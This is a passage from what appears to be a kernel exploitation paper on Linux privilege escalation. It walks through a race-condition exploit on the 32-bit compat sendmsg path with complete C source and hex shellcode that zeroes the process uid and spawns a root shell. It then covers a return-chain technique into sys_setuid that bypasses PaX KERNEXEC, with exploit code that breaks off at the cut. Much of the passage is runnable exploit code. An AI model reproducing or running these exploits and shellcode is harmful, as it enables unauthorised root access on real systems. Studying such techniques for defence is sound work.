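minimal userland sketch of the offset arithmetic. The struct is a mock
(mock_pda and the helper names are ours, and uint64_t stands in for the
8-byte pointer/long fields of x86_64); it only mirrors the four members
quoted from pda.h above and is not the kernel definition.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Userland mock of the first members of struct x8664_pda (2.6.9).
 * Assumption: every field is 8 bytes wide, as on x86_64. */
struct mock_pda {
        uint64_t pcurrent;      /* struct task_struct *  */
        uint64_t data_offset;   /* unsigned long         */
        uint64_t me;            /* struct x8664_pda *    */
        uint64_t kernelstack;   /* unsigned long         */
};

/* Displacement that a "%gs:disp" access needs for each member. */
size_t pda_off_pcurrent(void)
{
        return offsetof(struct mock_pda, pcurrent);
}

size_t pda_off_kernelstack(void)
{
        return offsetof(struct mock_pda, kernelstack);
}

/* Self-check: pcurrent sits at displacement 0, hence "movq %gs:0x0". */
void pda_selfcheck(void)
{
        assert(pda_off_pcurrent() == 0);
        assert(pda_off_kernelstack() == 3 * sizeof(uint64_t));
}
```

Under these assumptions the displacement for 'pcurrent' is 0, which is
exactly the constant used in the 'movq %gs:0x0, %rax' above.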

The second point which differs quite a bit from the x86 case is the
'restore' part (which is also a direct consequence of the use of %gs).
First of all we have to do a '64-bit based' restore, that is we have to
place the 64-bit values of RIP, CS, RFLAGS, RSP and SS on the stack and,
at the end, execute the 'iretq' instruction (the extended version of the
x86 'iret').
Just before returning we have to remember to execute the 'swapgs'
instruction, which swaps the %gs base with the value held in KernelGSbase
(MSR address C000_0102h).
If we don't restore gs, at the next syscall or interrupt the kernel will
use an invalid value for the gs register and will just crash.
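
To make the frame layout explicit, here is a small sketch of what
'iretq' expects to find at %rsp. The struct and function names are ours
(hypothetical); the offsets are the ones the shellcode below writes to
(0x0, 0x8, 0x10, 0x18 and 0x20 from %rsp).

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Frame consumed by iretq, lowest address (pointed to by %rsp) first. */
struct iretq_frame {
        uint64_t rip;     /* 0x00: userspace instruction pointer */
        uint64_t cs;      /* 0x08: code segment selector         */
        uint64_t rflags;  /* 0x10: flags register                */
        uint64_t rsp;     /* 0x18: userspace stack pointer       */
        uint64_t ss;      /* 0x20: stack segment selector        */
};

/* Returns 1 when the struct matches the five 8-byte slots listed above. */
int iretq_frame_layout_ok(void)
{
        return offsetof(struct iretq_frame, rip)    == 0x00 &&
               offsetof(struct iretq_frame, cs)     == 0x08 &&
               offsetof(struct iretq_frame, rflags) == 0x10 &&
               offsetof(struct iretq_frame, rsp)    == 0x18 &&
               offsetof(struct iretq_frame, ss)     == 0x20 &&
               sizeof(struct iretq_frame)           == 0x28;
}

/* Self-check, handy when porting the sketch to another compiler. */
void iretq_frame_selfcheck(void)
{
        assert(iretq_frame_layout_ok());
}
```

The struct is only a reading aid: the stub fills the same five slots with
plain 'movq' stores instead of pushes.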

Here's the shellcode in asm inline notation :

void stub64bit()
{
asm volatile (
                "movl %0, %%esi\t\n"
                "movq %%gs:0, %%rax\n"
                "xor %%ecx, %%ecx\t\n"
                "1: cmp $0x12c, %%ecx\t\n"
                "je 4f\t\n"
                "movl (%%rax), %%edx\t\n"
                "cmpl %%esi, %%edx\t\n"
                "jne 3f\t\n"
                "movl 0x4(%%rax),%%edx\t\n"
                "cmp %%esi, %%edx\t\n"
                "jne 3f\t\n"
                "xor %%edx, %%edx\t\n"
                "movl %%edx, 0x4(%%rax)\t\n"
                "jmp 4f\t\n"
                "3: add $4,%%rax\t\n"
                "inc %%ecx\t\n"
                "jmp 1b\t\n"
                "4:\t\n"
                "swapgs\t\n"
                "movq $0x000000000000002b,0x20(%%rsp)\t\n"
                "movq %1,0x18(%%rsp)\t\n"
                "movq $0x0000000000000246,0x10(%%rsp)\t\n"
                "movq $0x0000000000000023,0x8(%%rsp)\t\n"
                "movq %2,0x0(%%rsp)\t\n"
                "iretq\t\n"
                : : "i"(UID), "i"(STACK_OFFSET), "i"(CODE_OFFSET)
                );
}

UID is the 'uid' of the currently running process, while STACK_OFFSET and
CODE_OFFSET are the addresses of the userspace stack and code we're
returning into. All those values are taken and patched at runtime in the
exploit 'make_kjump' function :
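
The patching itself is plain byte arithmetic: each *_OFFSET constant is
the position of a 32-bit immediate inside the opcode bytes. A minimal
sketch of the idea on a single instruction follows; patch_u32, read_u32
and demo_patch_uid are hypothetical helper names of ours, and memcpy is
used here instead of the pointer cast of PATCH_CODE only to avoid an
unaligned access.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Overwrite the 4 bytes at buf+offset with value (host byte order,
 * which is little-endian on x86). */
void patch_u32(unsigned char *buf, size_t offset, uint32_t value)
{
        memcpy(buf + offset, &value, sizeof(value));
}

/* Read back the 4 bytes at buf+offset. */
uint32_t read_u32(const unsigned char *buf, size_t offset)
{
        uint32_t v;
        memcpy(&v, buf + offset, sizeof(v));
        return v;
}

/* Demo on a 5-byte "mov $imm32,%esi": opcode 0xbe followed by the
 * immediate, which therefore starts at offset 1. */
uint32_t demo_patch_uid(uint32_t uid)
{
        unsigned char insn[5] = { 0xbe, 0xe8, 0x03, 0x00, 0x00 };

        patch_u32(insn, 1, uid);
        assert(insn[0] == 0xbe);        /* opcode byte is untouched */
        return read_u32(insn, 1);
}
```

Counting the bytes of the stub in the same way gives 69 and 95 for the
immediates of the two 'movq' that hold the stack and code addresses.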

< stuff/expl/linux/sracemsg.c > 

#define PAGE_SIZE 0x1000
#define MMAP_ADDR ((void*)0x20000000)
#define MMAP_NULL ((void*)0x00000000)
#define PAGE_NUM 128

#define PATCH_CODE(base,offset,value) \
       *((uint32_t *)((char*)base + offset)) = (uint32_t)(value)

#define fatal_errno(x,y) { perror(x); exit(y); }

struct cmsghdr *g_ancillary;

/* global shared value to sync threads for race */
volatile static int glob_race = 0;

#define UID_OFFSET 1
#define STACK_OFF_OFFSET 69
#define CODE_OFF_OFFSET  95

[...]

int make_kjump(void)
{
  void *stack_map = mmap((void*)(0x11110000), 0x2000,
                         PROT_READ|PROT_WRITE,
                         MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED, 0, 0);
  if(stack_map == MAP_FAILED)
    fatal_errno("mmap", 1);


  void *shellcode_map = mmap(MMAP_NULL, 0x1000,
                             PROT_READ|PROT_WRITE|PROT_EXEC,
                             MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED, 0, 0);
  if(shellcode_map == MAP_FAILED)
    fatal_errno("mmap", 1);

  memcpy(shellcode_map, kernel_stub, sizeof(kernel_stub)-1);

  PATCH_CODE(MMAP_NULL, UID_OFFSET, getuid());
  PATCH_CODE(MMAP_NULL, STACK_OFF_OFFSET, 0x11111111);
  PATCH_CODE(MMAP_NULL, CODE_OFF_OFFSET,  &eip_do_exit);
}

< / > 
 

The rest of the exploit should be quite self-explanatory and we show the
full code shortly. Note the lowering of the priority inside
start_thread_priority ('nice(19)'), which gives us some more chance to win
the race (the 'glob_race' variable works just like a spin lock: the racer
thread spins on it until the main thread sets it - check 'race_func()').

As a last note, we use the 'rdtsc' (read time stamp counter) instruction
to measure the time that elapsed while trying to win the race. If this gap
is high it is quite probable that a reschedule happened.
The task of 'flushing all pages' (from the page cache), so that we can be
sure that we end up using demand paging on the cross boundary access, is
not implemented inside the code (it could have been easily added) and is
left to the exploit runner. Since we have to create the file with
controlled data, those pages end up cached in the page cache, and we have
to force the subsystem into discarding them. It shouldn't be hard for you,
if you followed the discussion so far, to perform tasks that would 'flush
the needed pages' (to disk) or to add code to automate it. (hint : a mass
find & cat * > /dev/null is an idea).
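
On the 'rdtsc' measurement: the listing reads the counter through the
"=A" constraint, which names the %edx:%eax pair only on 32-bit builds
(what -m32 gives us). A sketch that also works on 64-bit builds, under
the assumption of a GCC/Clang toolchain, could look like the following.
read_ticks, time_access and gap_is_suspicious are our own names, the
non-x86 fallback clock is only there to keep the sketch portable, and
any threshold is something you have to calibrate on your own box.

```c
#define _POSIX_C_SOURCE 199309L
#include <assert.h>
#include <stdint.h>
#include <time.h>

/* Read an increasing counter: the TSC on x86, a nanosecond clock
 * elsewhere (fallback, not part of the original code). */
uint64_t read_ticks(void)
{
#if defined(__i386__) || defined(__x86_64__)
        uint32_t lo, hi;
        __asm__ __volatile__("rdtsc" : "=a"(lo), "=d"(hi));
        return ((uint64_t)hi << 32) | lo;
#else
        struct timespec ts;
        clock_gettime(CLOCK_MONOTONIC, &ts);
        return (uint64_t)ts.tv_sec * 1000000000ull + (uint64_t)ts.tv_nsec;
#endif
}

/* Time a single 32-bit read and return the elapsed ticks. */
uint64_t time_access(const volatile uint32_t *p)
{
        uint64_t before = read_ticks();
        (void)*p;                       /* the access being measured */
        uint64_t after = read_ticks();
        return after - before;
}

/* Heuristic: a gap above 'threshold' suggests that something slow
 * (a page fault, a reschedule) happened in between. */
int gap_is_suspicious(uint64_t before, uint64_t after, uint64_t threshold)
{
        assert(after >= before);
        return (after - before) > threshold;
}
```

The absolute numbers mean little by themselves; what matters is the
difference between a run where the access hits a cached page and one
where it does not.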

Last but not least, since the vulnerable function is inside 'compat.c',
which implements the 'compatibility mode' used to run 32-bit binaries,
remember to compile the exploit with the -m32 flag.

< stuff/expl/linux/sracemsg.c >
   
#include <stdio.h>
#include <signal.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <sched.h>
#include <sys/socket.h>

#define PAGE_SIZE 0x1000
#define MMAP_ADDR ((void*)0x20000000)
#define MMAP_NULL ((void*)0x00000000)
#define PAGE_NUM 128

#define PATCH_CODE(base,offset,value) \
       *((uint32_t *)((char*)base + offset)) = (uint32_t)(value)

#define fatal_errno(x,y) { perror(x); exit(y); }

struct cmsghdr *g_ancillary;

/* global shared value to sync threads for race */
volatile static int glob_race = 0;

#define UID_OFFSET 1
#define STACK_OFF_OFFSET 69
#define CODE_OFF_OFFSET  95

char kernel_stub[] =

"\xbe\xe8\x03\x00\x00"                   //  mov    $0x3e8,%esi
"\x65\x48\x8b\x04\x25\x00\x00\x00\x00"   //  mov    %gs:0x0,%rax
"\x31\xc9"                               //  xor    %ecx,%ecx  (15
"\x81\xf9\x2c\x01\x00\x00"               //  cmp    $0x12c,%ecx
"\x74\x1c"                               //  je     400af0 <stub64bit+0x38>
"\x8b\x10"                               //  mov    (%rax),%edx
"\x39\xf2"                               //  cmp    %esi,%edx
"\x75\x0e"                               //  jne    400ae8 <stub64bit+0x30>
"\x8b\x50\x04"                           //  mov    0x4(%rax),%edx
"\x39\xf2"                               //  cmp    %esi,%edx
"\x75\x07"                               //  jne    400ae8 <stub64bit+0x30>
"\x31\xd2"                               //  xor    %edx,%edx
"\x89\x50\x04"                           //  mov    %edx,0x4(%rax)
"\xeb\x08"                               //  jmp    400af0 <stub64bit+0x38>
"\x48\x83\xc0\x04"                       //  add    $0x4,%rax
"\xff\xc1"                               //  inc    %ecx
"\xeb\xdc"                               //  jmp    400acc <stub64bit+0x14>
"\x0f\x01\xf8"                           //  swapgs (54
"\x48\xc7\x44\x24\x20\x2b\x00\x00\x00"   //  movq   $0x2b,0x20(%rsp)
"\x48\xc7\x44\x24\x18\x11\x11\x11\x11"   //  movq   $0x11111111,0x18(%rsp)
"\x48\xc7\x44\x24\x10\x46\x02\x00\x00"   //  movq   $0x246,0x10(%rsp)
"\x48\xc7\x44\x24\x08\x23\x00\x00\x00"   //  movq   $0x23,0x8(%rsp) /* 23 32-bit , 33 64-bit cs */
"\x48\xc7\x04\x24\x22\x22\x22\x22"       //  movq   $0x22222222,(%rsp)
"\x48\xcf";                              //  iretq


void eip_do_exit(void)
{
  char *argvx[] = {"/bin/sh", NULL};
  printf("uid=%d\n", geteuid());
  execve("/bin/sh", argvx, NULL);
  exit(1);
}


/*
 * This function maps stack and code segment
 * - 0x0000000000000000 - 0x0000000000001000   (future code space)
 * - 0x0000000011110000 - 0x0000000011112000   (future stack space)
 */

int make_kjump(void)
{
  void *stack_map = mmap((void*)(0x11110000), 0x2000,
                         PROT_READ|PROT_WRITE,
                         MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED, 0, 0);
  if(stack_map == MAP_FAILED)
    fatal_errno("mmap", 1);


  void *shellcode_map = mmap(MMAP_NULL, 0x1000,
                             PROT_READ|PROT_WRITE|PROT_EXEC,
                             MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED, 0, 0);
  if(shellcode_map == MAP_FAILED)
    fatal_errno("mmap", 1);

  memcpy(shellcode_map, kernel_stub, sizeof(kernel_stub)-1);

  PATCH_CODE(MMAP_NULL, UID_OFFSET, getuid());
  PATCH_CODE(MMAP_NULL, STACK_OFF_OFFSET, 0x11111111);
  PATCH_CODE(MMAP_NULL, CODE_OFF_OFFSET,  &eip_do_exit);
}

int start_thread_priority(int (*f)(void *), void* arg)
{
  char *stack = malloc(PAGE_SIZE*4);
  int tid = clone(f, stack + PAGE_SIZE*4 -4,
                  CLONE_FS|CLONE_FILES|CLONE_SIGHAND|CLONE_VM, arg);
  if(tid < 0)
  fatal_errno("clone", 1);

  nice(19);
  sleep(1);
  return tid;
}

int race_func(void* noarg)
{
  printf("[*] thread racer getpid()=%d\n", getpid());
  while(1)
  {
    if(glob_race)
    {
      g_ancillary->cmsg_len = 500;
      return;
    }
  }
}

uint64_t tsc()
{
  uint64_t ret;
  asm volatile("rdtsc" : "=A"(ret));

  return ret;
}

struct tsc_stamp
{
  uint64_t before;
  uint64_t after;
  uint32_t access;
};

struct tsc_stamp stamp[128];

inline char *flat_file_mmap(int fs)
{
  void *addr = mmap(MMAP_ADDR, PAGE_SIZE*PAGE_NUM,
                    PROT_READ|PROT_WRITE,
                    MAP_SHARED|MAP_FIXED, fs, 0);
  if(addr == MAP_FAILED)
    fatal_errno("mmap", 1);
  return (char*)addr;
}

void scan_addr(char *memory)
{
  int i;
  for(i=1; i<PAGE_NUM-1; i++)
  {
    stamp[i].access = (uint32_t)(memory + i*PAGE_SIZE);
    uint32_t dummy = *((uint32_t *)(memory + i*PAGE_SIZE-4));
    stamp[i].before = tsc();
    dummy = *((uint32_t *)(memory + i*PAGE_SIZE));
    stamp[i].after  = tsc();

  }
}

/* make code access first 32 pages to flush page-cluster */
/* access: 0x20000000 - 0x2000XXXX */

void start_flush_access(char *memory, uint32_t page_num)
{
  int i;
  for(i=0; i<page_num; i++)
  {
    uint32_t dummy = *((uint32_t *)(memory + i*PAGE_SIZE));
  }
}


void print_single_result(struct tsc_stamp *entry)
{
  printf("Accessing: %p, tsc-difference: %lld\n", entry->access,
         entry->after - entry->before);
}


void print_result()
{
  int i;
  for(i=1; i<PAGE_NUM-1; i++)
  {
    printf("Accessing: %p, tsc-difference: %lld\n", stamp[i].access,
           stamp[i].after - stamp[i].before);
  }
}


void fill_ancillary(struct msghdr *msg, char *ancillary)
{
  msg->msg_control = ((ancillary + 32*PAGE_SIZE) -
                      sizeof(struct cmsghdr));
  msg->msg_controllen = sizeof(struct cmsghdr) * 2;

  /* set global var thread race ancillary data chunk */
  g_ancillary = msg->msg_control;

  struct cmsghdr* tmp = (struct cmsghdr *)(msg->msg_control);
  tmp->cmsg_len   = sizeof(struct cmsghdr);
  tmp->cmsg_level = 0;
  tmp->cmsg_type  = 0;
  tmp++;

  tmp->cmsg_len   = sizeof(struct cmsghdr);
  tmp->cmsg_level = 0;
  tmp->cmsg_type  = 0;
  tmp++;

  memset(tmp, 0x00, 172);
}

int main()
{
  struct tsc_stamp single_stamp = {0};
  struct msghdr msg = {0};

  memset(&stamp, 0x00, sizeof(stamp));
  int fd = open("/tmp/file", O_RDWR);
  if(fd == -1)
    fatal_errno("open", 1);

  char *addr = flat_file_mmap(fd);

  fill_ancillary(&msg, addr);

  munmap(addr, PAGE_SIZE*PAGE_NUM);
  close(fd);
  make_kjump();
  sync();

  printf("Flush all pages and press a enter:)\n");
  getchar();

  fd = open("/tmp/file", O_RDWR);
  if(fd == -1)
    fatal_errno("open", 1);
  addr = flat_file_mmap(fd);

  int t_pid = start_thread_priority(race_func, NULL);
  printf("[*] thread main getpid()=%d\n", getpid());

  start_flush_access(addr, 32);


  int sc[2];
  int sp_ret = socketpair(AF_UNIX, SOCK_STREAM, 0, sc);
  if(sp_ret < 0)
    fatal_errno("socketpair", 1);

  single_stamp.access = (uint32_t)g_ancillary;
  single_stamp.before = tsc();

  glob_race =1;
  sendmsg(sc[0], &msg, 0);

  single_stamp.after = tsc();

  print_single_result(&single_stamp);

  kill(t_pid, SIGKILL);
  munmap(addr, PAGE_SIZE*PAGE_NUM);
  close(fd);
  return 0;
}

< / > 


------[ 3 - Advanced scenarios 


In an attempt to ''complete'' our discussion of kernel exploiting we're
now going to discuss two 'advanced scenarios' : a stack based kernel
exploit capable of bypassing PaX [18] KERNEXEC and the Userland /
Kernelland split, and an effective remote exploit, both for the Linux
kernel.


---[ 3.1 - PaX KERNEXEC & separated kernel/user space


The PaX KERNEXEC option emulates a no-exec bit for kernel land pages on an
architecture which doesn't have one (x86), while the User / Kernel Land
split blocks the 'return-to-userland' approach that we have extensively
described and used in the paper. With those two protections active we're
basically facing the same scenario we encountered discussing the
Solaris/SPARC environment, so we won't go into more detail here (to avoid
duplicating the discussion).

This time, though, we won't have any executable and controllable memory
area (no u_psargs array), and we're going to present a different technique
which doesn't require one. Even if the idea behind it applies well to any
no-exec and separated kernel/userspace environment, as we'll see shortly,
this approach is quite architecture (stack management and function
call/return implementation) and Operating System (handling of credentials)
specific.

Moreover, it requires precise knowledge of the .text layout of the
running kernel, so at least a readable image (which is the default
situation on many distros, on Solaris, and on other operating systems we
checked) or a large or controlled infoleak is necessary.

The idea is not much different from the theory behind 'ret-into-libc' or
other userland exploiting approaches that attempt to circumvent the non
executability of heap and stack : as we know, Linux associates
credentials to each process in terms of numeric values :

< linux-2.6.15/include/linux/sched.h >

struct task_struct {
[...]
/* process credentials */
        uid_t uid,euid,suid,fsuid;
        gid_t gid,egid,sgid,fsgid;
[...]
}

< / > 

Sometimes a process needs to raise (or drop, for security reasons) its
credentials, so the kernel exports system calls to do that.
One of those is sys_setuid :

< linux-2.6.15/kernel/sys.c >

asmlinkage long sys_setuid(uid_t uid)
{
        int old_euid = current->euid;
        int old_ruid, old_suid, new_ruid, new_suid;
        int retval;

        retval = security_task_setuid(uid, (uid_t)-1, (uid_t)-1,
                                      LSM_SETID_ID);
        if (retval)
                return retval;

        old_ruid = new_ruid = current->uid;
        old_suid = current->suid;
        new_suid = old_suid;

        if (capable(CAP_SETUID)) {              [1]
                if (uid != old_ruid && set_user(uid, old_euid != uid) < 0)
                        return -EAGAIN;
                new_suid = uid;
        } else if ((uid != current->uid) && (uid != new_suid))
                return -EPERM;

        if (old_euid != uid)
        {
                current->mm->dumpable = suid_dumpable;
                smp_wmb();
        }
        current->fsuid = current->euid = uid;    [2] 
        current->suid = new_suid;

        key_fsuid_changed(current);
        proc_id_connector(current, PROC_EVENT_UID);

        return security_task_post_setuid(old_ruid, old_euid, old_suid,
                                         LSM_SETID_ID);
}

< / > 

As you can see, the 'security' checks (apart from the LSM security_* entry
points) are performed at [1] and after those, at [2], the values of fsuid
and euid are set equal to the value passed to the function.
sys_setuid is a system call, so, due to the system call convention,
parameters are passed in registers. More precisely, 'uid' will be passed
in '%ebx'.
The idea is simple (and not different from 'ret-into-libc' [19] or other
userspace page protection evading techniques like [20]) : if we manage to
have 0 in %ebx and to jump right into the middle of sys_setuid (right
after the checks) we should be able to change the 'euid' and 'fsuid' of
our process and thus raise our privileges.
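
The relationship between the gate at [1] and the assignment at [2] can be
modelled in userland with a few lines of C. This is a deliberately
simplified sketch: mock_cred, muid_t and model_setuid are our own names,
the LSM hooks and the set_user() failure path are left out, and the
'has_cap_setuid' flag stands in for capable(CAP_SETUID).

```c
#include <assert.h>
#include <errno.h>

typedef unsigned int muid_t;            /* stand-in for uid_t */

/* Only the four uid fields of task_struct that sys_setuid touches. */
struct mock_cred {
        muid_t uid, euid, suid, fsuid;
};

long model_setuid(struct mock_cred *c, muid_t uid, int has_cap_setuid)
{
        muid_t new_suid = c->suid;

        /* [1] the permission gate */
        if (has_cap_setuid) {
                c->uid = uid;           /* effect of a successful set_user() */
                new_suid = uid;
        } else if (uid != c->uid && uid != new_suid) {
                return -EPERM;
        }

        /* [2] reached only if the gate let us through; from here on
         * the value in 'uid' is written without further checks */
        c->fsuid = c->euid = uid;
        c->suid = new_suid;
        return 0;
}

/* Self-check: an unprivileged caller asking for uid 0 is rejected. */
void model_setuid_selfcheck(void)
{
        struct mock_cred c = { 1000, 1000, 1000, 1000 };

        assert(model_setuid(&c, 0, 0) == -EPERM);
        assert(c.euid == 1000 && c.fsuid == 1000);
}
```

Everything that protects the assignment lives before [2], which is why
the entry point chosen for the jump matters so much.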

Let's see the sys_setuid disassembly to better tune our idea :

[...]
c0120fd0:       b8 00 e0 ff ff          mov    $0xffffe000,%eax  [1]
c0120fd5:       21 e0                   and    %esp,%eax
c0120fd7:       8b 10                   mov    (%eax),%edx
c0120fd9:       89 9a 6c 01 00 00       mov    %ebx,0x16c(%edx)  [2]
c0120fdf:       89 9a 74 01 00 00       mov    %ebx,0x174(%edx)
c0120fe5:       8b 00                   mov    (%eax),%eax
c0120fe7:       89 b0 70 01 00 00       mov    %esi,0x170(%eax)
c0120fed:       6a 01                   push   $0x1
c0120fef:       8b 44 24 04             mov    0x4(%esp),%eax
c0120ff3:       50                      push   %eax
c0120ff4:       55                      push   %ebp
c0120ff5:       57                      push   %edi
c0120ff6:       e8 65 ce 0c 00          call   c01ede60
c0120ffb:       89 c2                   mov    %eax,%edx
c0120ffd:       83 c4 10                add    $0x10,%esp        [3]
c0121000:       89 d0                   mov    %edx,%eax
c0121002:       5e                      pop    %esi
c0121003:       5b                      pop    %ebx
c0121004:       5e                      pop    %esi
c0121005:       5f                      pop    %edi
c0121006:       5d                      pop    %ebp
c0121007:       c3                      ret


At [1] the task_struct of the current process is derived from the kernel
stack pointer. At [2] the %ebx value is copied over the 'euid' and 'fsuid'
members of the struct. We have our return address, which is [1].
At that point we need to somehow force %ebx to 0 (if we're not lucky
enough to have it already zeroed).
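
The 'mov $0xffffe000,%eax ; and %esp,%eax' pair at [1] is just a mask
that rounds the stack pointer down to the base of the kernel stack, where
thread_info (whose first member points to the task_struct) lives. A
minimal sketch of the arithmetic, assuming a power-of-two stack size
(stack_base is a hypothetical helper name of ours) :

```c
#include <assert.h>
#include <stdint.h>

/* Base of the kernel stack for a given stack pointer.
 * Assumption: stack_size is a power of two (8192 or 4096 on x86). */
uint32_t stack_base(uint32_t esp, uint32_t stack_size)
{
        assert(stack_size != 0 && (stack_size & (stack_size - 1)) == 0);
        return esp & ~(stack_size - 1);
}

/* The mask for 8K stacks is the constant seen in the disassembly. */
uint32_t stack_mask_8k(void)
{
        return ~(uint32_t)(8192 - 1);
}
```

With 8K stacks the mask is 0xffffe000, with 4K stacks it would be
0xfffff000; the exploit code defines STACK_SIZE and STACK_MASK along the
same lines.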

To demonstrate this approach we have used the locally exploitable
buffer overflow in the dummy.c driver (KERN_IOCTL_STORE_CHUNK ioctl()
command). Since it's a stack based overflow we can chain multiple return
addresses, preparing a fake stack frame that we totally control.
We need :

 - a zeroed %ebx : the easiest way to achieve that is to find a pop %ebx
   followed by a ret instruction [we control the stack] :

        ret-to-pop-ebx:
                [*] c0100cd3:       5b      pop    %ebx
                [*] c0100cd4:       c3      ret
    
   we don't strictly need pop %ebx directly followed by ret, we may find a
   sequence of pops before the ret (and, among those, our pop %ebx). It is
   just a matter of preparing the right ZERO-layout for the pop sequence
   (to make it simple, add a ZERO 4-bytes sequence for any pop between the
   %ebx one and the ret)

 - the return addr where to jump, which is the [1] address shown above

 - a 'ret-to-ret' padding to take care of the stack gap created at [3] by
   the function epilogue (%esp adding and register popping) :
        
        ret-to-ret pad:
                [*] 0xffffe413      c3      ret 

   (we could have used the above ret as well; this one is in the vsyscall
    page and was used in other exploits where we didn't need so much
    knowledge of the kernel .text.. it survived here :) )

 - the address of an iret instruction to return to userland (and a crafted
   stack frame for it, as we described above while discussing 'Stack
   Based' exploitation) :

        ret-to-iret:
                [*] c013403f:       cf      iret


Putting it all together, this is how our 'stack' should look to perform a
correct exploitation :

low addresses
            +----------------+
            | ret-to-ret pad |
            | ret-to-ret pad |
            | .............. |
            | ret-to-pop ebx |
            | 0x00000000     |
            | ret-to-setuid  |
            | ret-to-ret pad |
            | ret-to-ret pad |
            | ret-to-ret pad |
            | .............  |
            | .............  |
            | ret-to-iret    |
            | fake-iret-frame|
            +----------------+
high addresses


Once correctly returned to userspace we have successfully modified the
'fsuid' and 'euid' values, but our 'ruid' is still the original one. At
that point we simply re-exec ourselves to get euid=0 and then spawn the
shell.
Code follows :

< stuff/expl/grsec_noexec.c >

#include <sys/ioctl.h>
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/mman.h>

#include "dummy.h"

#define DEVICE "/dev/dummy"
#define NOP 0x90
#define PAGE_SIZE 0x1000
#define STACK_SIZE 8192
//#define STACK_SIZE 4096


#define STACK_MASK ~(STACK_SIZE -1)
/* patch it at runtime */


#define ALTERNATE_STACK 0x00BBBBBB

/*2283d*/
#define RET_INTO_RET_STR   "\x3d\x28\x02\x00"
#define DUMMY              RET_INTO_RET_STR
#define ZERO               "\x00\x00\x00\x00"

/* 22ad3 */
#define RET_INTO_POP_EBX   "\xd3\x2a\x02\x00"
/* 1360 */
#define RET_INTO_IRET      "\x60\x13\x00\x00"
/* 227fc */
#define RET_INTO_SETUID    "\xfc\x27\x02\x00"

// do_eip at .text offset (to be reviewed)
// 0804864f
#define USER_CODE_OFFSET   "\x4f\x86\x04\x08"
#define USER_CODE_SEGMENT  "\x73\x00\x00\x00"
#define USER_EFLAGS        "\x46\x02\x00\x00"
#define USER_STACK_OFFSET  "\xbb\xbb\xbb\x00"
#define USER_STACK_SEGMENT "\x7b\x00\x00\x00"


/* sys_setuid - grsec kernel */
/*
   227fc:       89 e2                   mov    %esp,%edx
   227fe:       89 f1                   mov    %esi,%ecx
   22800:       81 e2 00 e0 ff ff       and    $0xffffe000,%edx
   22806:       8b 02                   mov    (%edx),%eax
   22808:       89 98 50 01 00 00       mov    %ebx,0x150(%eax)
   2280e:       89 98 58 01 00 00       mov    %ebx,0x158(%eax)
   22814:       8b 02                   mov    (%edx),%eax
   22816:       89 fa                   mov    %edi,%edx
   22818:       89 a8 54 01 00 00       mov    %ebp,0x154(%eax)
   2281e:       c7 44 24 18 01 00 00    movl   $0x1,0x18(%esp)
   22825:       00
   22826:       8b 04 24                mov    (%esp),%eax
   22829:       5d                      pop    %ebp
   2282a:       5b                      pop    %ebx
   2282b:       5e                      pop    %esi
   2282c:       5f                      pop    %edi
   2282d:       5d                      pop    %ebp
   2282e:       e9 ef d5 0c 00          jmp    efe22 <cap_task_post_setuid>
   22833:       83 ca ff                or     $0xffffffff,%edx
   22836:       89 d0                   mov    %edx,%eax
   22838:       5f                      pop    %edi
   22839:       5b                      pop    %ebx
   2283a:       5e                      pop    %esi
   2283b:       5f                      pop    %edi
   2283c:       5d                      pop